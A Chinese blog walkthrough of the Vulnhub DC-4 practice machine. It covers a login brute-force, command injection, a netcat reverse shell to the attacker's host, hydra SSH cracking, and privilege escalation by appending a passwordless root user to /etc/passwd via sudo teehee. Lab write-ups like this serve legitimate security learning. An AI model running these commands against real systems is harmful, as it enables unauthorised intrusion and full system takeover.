DC-4靶机学习

1.日常扫描局域网存活主机

DC-4靶机学习
发现目标:192.168.43.30
开启了80端口和22端口,80端口进去是一个登陆框,可以尝试爆破,随手整了个top500

2.爆破一把梭

DC-4靶机学习
登陆窗口,试了万能密码,不行,于是想到暴力破解
DC-4靶机学习
梭出来了,admin:happy

3.命令执行

DC-4靶机学习
抓包
DC-4靶机学习
登陆进去发现可以执行系统命令,于是抓包,实现执行任意命令(在所拥有的权限之下)

4.nc反弹shell

先监听好

nc -lvvp 8001

然后执行反弹

nc 192.168.43.164 8001 -e /bin/bash

DC-4靶机学习
DC-4靶机学习
弹回来了,随手看下whoami,顺便翻翻目录下有什么东西
home目录下有三个用户

jim
sam
charles

缺几个密码,2333
DC-4靶机学习
在/home/jim/backups/下发现一个可能是旧密码的密码备份文件,于是拿下来,拿去爆破

5.hydra破解ssh密码

DC-4靶机学习
密码到手,ssh连接进去

6.谜之邮件

DC-4靶机学习
在这里有一封邮件,我居然,居然没注意就看过去了。。。。裂开(还是要细心啊)
DC-4靶机学习
DC-4靶机学习
后面又看了几遍,终于看到邮件了,简直热泪盈眶,邮件里面是一个用户的密码【自己出去浪可还行】
切换用户过去
DC-4靶机学习
我在这就卡住了,到底还是太菜了

7.???没错,是我看不懂的提权

https://www.cnblogs.com/zaqzzz/p/12075132.html
https://www.jianshu.com/p/ac10a4149eef
sudo -l 显示出自己(执行 sudo 的使用者)的权限
DC-4靶机学习
提权

charles@dc-4:/home/jim$ echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

DC-4靶机学习

切换用户,getflag
DC-4靶机学习

8.总结

这里提权各有优劣吧,一个是利用定时任务反弹root权限
另一个取巧直接添加一个root用户【妙啊】
DC-4靶机学习

上一篇:Vulnhub DC4


下一篇:jenkins + bitbucket 实现 pr自动构建及build状态通知